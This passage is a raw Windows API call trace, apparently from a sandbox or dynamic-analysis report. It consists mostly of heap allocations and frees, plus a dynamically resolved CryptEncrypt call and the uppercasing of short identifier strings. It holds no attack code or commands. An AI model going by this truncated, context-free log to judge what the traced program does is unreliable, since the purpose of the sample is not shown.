| out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.432] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa0c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.435] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0264.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2170 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2190 | out: hHeap=0x25c0000) returned 1 [0264.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0264.436] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.442] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.442] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.442] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.442] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.442] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.442] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.443] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.443] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.443] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.443] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.443] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.444] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.444] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.463] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.463] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.464] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.464] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.464] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.464] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.464] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.465] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.465] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.465] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.466] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.467] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.467] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0264.467] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 